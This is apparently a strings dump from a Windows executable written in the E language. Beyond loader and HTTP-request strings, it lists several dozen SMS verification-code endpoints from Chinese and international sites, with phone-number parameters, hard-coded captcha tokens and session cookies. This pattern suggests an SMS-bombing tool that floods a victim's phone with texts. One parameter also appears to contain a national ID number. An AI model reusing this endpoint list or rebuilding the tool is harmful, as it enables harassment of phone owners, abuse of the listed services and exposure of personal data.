.text
`.rdata
@.data
.rsrc
GetNewSock
Error
krnln.fne
Not found the kernel library or the kernel library is invalid!
krnln.fnr
Software\FlySky\E\Install
MessageBoxA
USER32.dll
ExitProcess
FreeLibrary
GetProcAddress
LoadLibraryA
lstrcatA
lstrlenA
KERNEL32.dll
RegCloseKey
RegOpenKeyExA
RegQueryValueExA
ADVAPI32.dll
GetModuleFileNameA
const
https://note.youdao.com/yws/public/note/fdc9a865df2923eaecea71bf26cd8d4f
<\/div><div yne-bulb-block=\"paragraph\" style=\"white-space: pre-wrap;\">
OPTIONS
DELETE
TRACE
CONNECT
WinHttp.WinHttpRequest.5.1
@SetTimeouts
SetProxy
Basic
Proxy-Authorization
SetRequestHeader
Option
Accept: */*
Accept:
Accept: */*
Referer:
Referer:
Accept-Language:
Accept-Language: zh-cn
User-Agent:
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
content-type
Content-Type
Content-Type:
Content-Type: application/x-www-form-urlencoded
Cookie
ResponseBody
GetallResponseHeaders
Status
Set-Cookie
Set-Cookie:
@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
=deleted
13841200000
(*.*)|*.*
18341200000
&type=24&aid=1319
https://m.pipix.com/passport/web/send_code/?account_sdk_source=web&mobile=
http://www.721889.com/home/passport/sendSms?mobile=
Accept-Language: zh-CN,zh;q=0.9
http://mservice.moerlong.com:8805/sso/sendSMSCode
&syscode=1174726&action=Register
mobile=
https://capi.wealth365.com.cn/storm/userbase/register/verifycode/H5?b=8&c=4&ch=
","codeType":0,"validationType":1,"operationType":0,"source":"1"}
{"c":3,"mobile":"
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 115Browser/9.1.1
https://intrepaypro.handmart.cn/hpayDFPaySupport/system/authSmsCode
&msgType=1&channelCode=hbwallet
http://xjy.coocm.com/wap/channel/sendsms.html
Accept-Language: zh-CN,zh;q=0.9
&appName=jkb&graphicCode=&clientType=
https://a.shuziqb.com/hkd_boot/userLogin/getPhoneCodeNew?type=1&phone=
https://vip-service-center.vcredit.com/vip-api/loanInvite/loanInviteAccept
","userSource":2}
{"userIdKey":"33DFD1CAE4DA7176","userMobile":"
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 115Browser/9.1.1
%22%2C%22mode%22%3A1%2C%22imageCode%22%3A%22%22%2C%22deviceCode%22%3A77.09578668767404%2C%22tokenId%22%3A%22%22%2C%22fileName%22%3A338.95248280523725%2C%22sourceType%22%3A%227%22%2C%22version%22%3A%222.4.0%22%2C%22utmCode%22%3A100%7D&credithc-request-client-type=html5&_=
https://hyd.hengchang6.com/hyd/services/hydUser/smsCodeForLogin?callback=success_jsonpCallback&jsonParams=%7B%22userPhone%22%3A%22
https://dbzloan.xiaojinqb.cn/common/getVerifyCode.do
&type=1
http://api.mobile.auth.xiaozhoudao.net/register/sms/code/send
&token=
telephone=
https://www.grwdai.com:6708/grw-api/user/sendSmsMessage
&type=1&openId=xjzz
phoneMob=
https://api.haoqianbao.com/api/member/hasUser
{"user":{"umobile":"
http://www.tukuchina.cn/index.php?r=site/SendMessageLogin
&geetest_challenge=5ace54a824f01d4f427d70288f458be3&geetest_validate=ff4273cdb85d30e3c752a8d6ba8a8362&geetest_seccode=ff4273cdb85d30e3c752a8d6ba8a8362%7Cjordan&sessionId=CA8831D6F0ABA1CF7E5305C0D5F7C511&_=1551025760617
https://service.youshang.com/commonservice/ajaxChecking.do?callback=jQuery111204568359262588684_1551025760610&action=geetestVerify&nextAction=sendYZJSMS&mobile=
&type=2&_=
http://office.teacher.com.cn/auth/captcha?telephone=
https://imsummer.cn/invite_register/index
user_id=af1aa453-5f52-4d05-bd65-8e52a646fae0&phone=%2B86
&geetest_challenge=e161939d5f264d1bf745142b87c69935&geetest_validate=58819b9b78b46de2e7eace3031f88e0b&geetest_seccode=58819b9b78b46de2e7eace3031f88e0b
https://service.youshang.com/commonservice/ajaxChecking.do?callback=jQuery111209130881338707941_1551182115561&action=geetestVerify&nextAction=sendSMS&mobile=
http://xc.kuaiyiche.me/app/Login/getPhoneCode
&use_type=1
http://yxyb.shanzuking.com/api/site/sendsms
type=registered&mobile_phone=
https://loan.sinaquyong.com/api/msg/sms/landing/code.do?t=
&source=000007015
codeType=1&mobileNo=
https://jie.gomemyf.com/jie-api/facade/h5post.do
","serKey":"5f28f2b858a6abf5e20800115546385f","clientType":"H5"}
jsonData={"service":"001009","mobile":"
&type=02&deviceType=android
http://mtransfer.ulinkcredit.com/openapi/allinpay.balance.service/balance/sendMsgByHtml?mobile=
https://hdgateway.zto.com/auth_account_sendRegisterSmsVerifyCode
{"mobile":"
Accept-Language: zh-CN,zh;q=0.9
http://www.57de.com/index.php?m=&c=sms&a=sendSmsCode
®_imgcode=&type=ureg
phone=
success">
http://www.suzhoudk.com/plus/search.php?phone=
http://www.zdaiwang.com/sms.php
http://www.91hrw.cn/home/passport/sendsms.html
&sms_yzm=undefined
http://admin.benfen.tech/home/CustomerFromH5/sendCode
http://www.casheasy.cn:8081/api/verify/imageCode/status
","smsTagId":""}}
{"header":{"channel":"","deviceInfo":"Wechat","deviceIp":"","inputCharset":"utf-8","requestDate":"20160905","requestTime":"115001","service":"100005","requestId":"e5806547-ed72-49a4-b7ee-f5e2d1806fea"},"body":{"mobNo":"
Accept-Language: zh-CN,zh;q=0.9
https://cardloan.xiaoying.com/h5/user/check_register
&os=h5&_srcid=100026631
http://www.zhuolu2018.com/user/getVerifyCode?phone=
https://www.icve.com.cn/commonUser/portal/register/sendCode
&countryCode=86
&csrf=05eLEiGvNiOFs26Q
http://ly.yichang.gov.cn/index.php/index/authCode?phone=
&t_type=
https://www.acc5.com/module.php?c=verify_code&action=reg&phone=
https://accounts.douban.com/j/mobile/login/request_phone_code
ck=&area_code=%2B86&number=
&country=CN
https://unite.nike.com/phoneVerification?appVersion=577&experienceVersion=475&uxid=com.nike.commerce.nikedotcom.web&locale=zh_CN&backendEnvironment=identity&browser=Google%20Inc.&os=undefined&mobile=false&native=false&visit=1&visitor=1517902f-6512-41ee-82e9-3d35cdb98c4e&phoneNumber=86
https://www.szcredit.com.cn/xy2.outside/AJax/ZCPhoneCheckCode.ashx
&uid=230231200206233315&type=1
dealType=
http://wsdj.saic.gov.cn/saicreg/register/verifyCodeSend
phoneNo=
http://www.ancc.org.cn/Member/registerNew.aspx?action=nul&Requst_Source=
&Txt_subjoin=&Btn_subjoin=%E8%8E%B7%E5%8F%96%E9%AA%8C%E8%AF%81%E7%A0%81&Txt_PassWord=&Txt_RePassWord=
__VIEWSTATE=%2FwEPDwUJODk2MTIyNzE4ZGSKz73ufo7zMbJzoiIAMr3ELwPEUmqU5HLznJDRnpelow%3D%3D&__VIEWSTATEGENERATOR=7DAEFE4F&Top%24h_keyword=&navBar%24h_keyword=&Txt_UserName=&Txt_Email=&Txt_Tel=
http://www.hstechsz.com/?ct=login&ac=sendsms
&code_type=reg
https://txwk.10010.com/KCard/wxColletion/sendCodeInfo
1970-01-01 08:00:00
https://www.jieyide.cn/member.php?mod=register
formhash" value="
https://www.jieyide.cn/plugin.php?id=zhanmishu_sms:send&no_submit=no_submit&method=send
&code=922730&sms_verify=&nationcode=86
&referer=https%3A%2F%2Fwww.jieyide.cn%2Fvip%2F&activationauth=&elvuka=%E5%8F%AF%E7%88%B1%E9%A3%98&L1nbtn=a123456&Y9fv3f=a123456&KMAM3Q=2171755355%40qq.com&mobile=
regsubmit=yes&formhash=
Accept-Language: zh-CN,zh;q=0.9
ScriptControl
JScript
Language
';return unescape(x);}
function xx(){var x='
ExecuteStatement
Adodb.Stream
Write
Position
unicode
Charset
ReadText
Close
https://www.qianpen.com/user-center/sendcode/send-phone-code-register?u_asec=099%23KAFE17E9EXEEhYTLEEEEEpEQz0yFD6PTSXRIS6zHDrsYW6P3DXyEn6t1BYFETRpCD6jXE7EFbOR5D3UTETOLrTMkUllP%2FcZoFjhtvMRx%2BKhFVovK8Pc9Z6ITEEaU%2F3iSlZTHaIBi8%2FlxE7EqWRaSt3tIvbCHSVOlBYFETRpCD6ixE7EqWRaSt3dGloCHSVOlfYFE1XZdhj8qluZlcJMTEEvP%2Fwon23lP%2Fna4E7EFb%2FR5DcYTEHI15sGEjOTDfJ6%2F1HN7Va6o3kikLwCIRvmQom4RyUQCqHGt%2BTfuViqaqNDfwwLY0mDSqqaqyUNSqwqS8TfuViqac1IRkmw4qDGtIUYRyUQGBwSGAYFE0OIlD3YScblcL4wsDRrsLaScwRBycRK63Me6r02Wr7PclMeAnaeCivDc1s32riURiUF3%2BuUW%2FqQREyWdCwUQL4Tt9235rAocwEz6zqFnHQe6wBZCGRonann6LyByNsj6CG%2F7u0XCruGTE1LP%2F3iSlllP%2FcZddYslluVSsyaaolllWMiP%2F3IclllzgcZddYsllu8FBEFE1cZdt0dkoBIKsYFETrudt%2F95AFMTEEyP%2F9iSllluE7EFL2xhGDQTEExCbPi5DEFETcZdt9TZE7EKsyAKxkwlsySoMYFE1u%2Btt37bYzn5YPpjMYFE1u%2Bdt37dF0n5YPpjBYFETRpCD6iWE7EjWRYxFg9lsyaPe1Ue%2F0Z1SUgXE7EFbOR5D6ITEEaU%2F3iSlDLPaIBi8%2FtXE7EFbOR5D6ITEEaU%2F3iSlDYBaIBi8%2FlxE7EqWRaSt3to8qCHSVOlSYFEwc%2Bdt3ilBEBqgfc2llUTETiNrBNQY3lP%2FcZBqLRK4M3MG6WEsY%3D%3D&u_atype=2
&channel=user-center-register-PC
&sessionId=
_uab_collina=155703230058706492537855; UM_distinctid=16a865b35cc786-06fc65e8eda4f3-6d0c07-1fa400-16a865b35cdaeb; aliyungf_tc=AQAAAGqGj0VK4QUAOinkcT8xt9K+vfIM; acw_tc=76b20f6a15570322893981596e4f46adb893318c023c8cbaa95fbc382d9119; 136a3d03-9748-4f83-a54f-9b2a93f979a0=e7ee4c5c-3e12-43b9-b389-1c9b7d6b35a5; _ga=GA1.2.1166889318.1557032290; _gid=GA1.2.1350661909.1557032290; _jzqx=1.1557032290.1557032290.1.jzqsr=baike%2Eqianpen%2Ecom|jzqct=/dkbk/wljd/13756%2Ehtml.-; _jzqckmp=1; CNZZDATA1253109578=2102872924-1557027041-null%7C1557027041; Hm_lvt_b6405d746b704d5415b876b2478f7517=1557032290; Hm_lpvt_b6405d746b704d5415b876b2478f7517=1557032294; _qzja=1.1339668177.1557032289935.1557032289935.1557032289935.1557032289935.1557032293995..0.0.2.1; _qzjb=1.1557032289935.2.0.0.0; _qzjc=1; _qzjto=2.1.0; _jzqa=1.850139233399563600.1557032290.1557032290.1557032290.1; _jzqc=1; _jzqb=1.2.10.1557032290.1; url_session_id=0.8736910672969914; u_asec=099%23KAFEQGEKE7EEhYTLEEEEEpEQz0yFD6PTSXRIS6zHDrsYW6P3DXyEn6t1WEFE5YKi%2FEThbJmSoZdIkmwvqDGt062q3IYrfBgAk7PrLLIGBwZIHnsNqaqCBmSqccTNBB7GaqAr%2BB7GqaxMHnsNqaqQIYP05c7aBwS%2B%2BEPrLLTo3iwhE7T8bLl5uw7WadWc73%2F5rsr337QqPfbQb4St%2BUZVNOeV1Sst%2BOJ9cOKc95QRbteVcYPcY7uRWLedaYbT%2FOaIcL%2Bc7JDtUtxsHGQq14Z4GioB%2BUS69yREPa939oZ6PfrBPFnR1twVNspssEFEpcZdt3illuZdsyaCw%2FllsviP%2F36alllzgcZddYsllu8FsyaCw%2FllWMjoE7EIsyaDvA0AoYvrE7EhssaZttiFjYFETrZtt3illlQTEEx6zIywBYFETRpCD6i5E7EFsyaDdE%3D%3D
function time(){return Math.random()}
https://my.22.cn/register.html
hidden" value="
&b_mobiletail=&ftoken=
&act=send&type=regvalid&newM=1&mobilenum=
https://my.22.cn/ajax/member/mobile.ashx?t=
http://www.soozhu.com/souzhuusers/regist/
csrftoken
http://www.soozhu.com/souzhuusers/login/sendvcode/
&phone=
csrfmiddlewaretoken=
https://xluser-ssl.xunlei.com/xluser.core.login/v3/sendsms
xluser-ssl.xunlei.com
keep-alive
Connection
max-age=0
Cache-Control
http://i.xunlei.com
Origin
Upgrade-Insecure-Requests
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 115Browser/9.1.1
User-Agent
multipart/form-data; boundary=----WebKitFormBoundaryKBY8fudvIRGrZkC8
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept
http://i.xunlei.com/login/?r_d=1&use_cdn=0×tamp=1557220084462&refurl=http%3A%2F%2Fi.xunlei.com%2Fxluser%2Flogin.html
Referer
zh-CN,zh;q=0.9
Accept-Language
UTF-8
WriteText
https://jq.qq.com/?_wv=1027&k=5kMVbpX
ole32.dll
kernel32.dll
user32
user32.dll
kernel32
CoInitialize
CoUninitialize
MultiByteToWideChar
WideCharToMultiByte
GetCurrentProcessId
MessageBoxTimeoutA
FindWindowExA
IsWindow
IsWindowVisible
GetWindowThreadProcessId
GetWindowTextLengthA
GetWindowTextA
GetClassNameA
GetLocalTime
GetInputState
imSun
uP| s
@reloc1
VS_VERSION_INFO
StringFileInfo
080404B0
FileVersion
1.0.0.0
FileDescription
ProductName
ProductVersion
1.0.0.0
CompanyName
LegalCopyright
852190049
Comments
VarFileInfo
Translation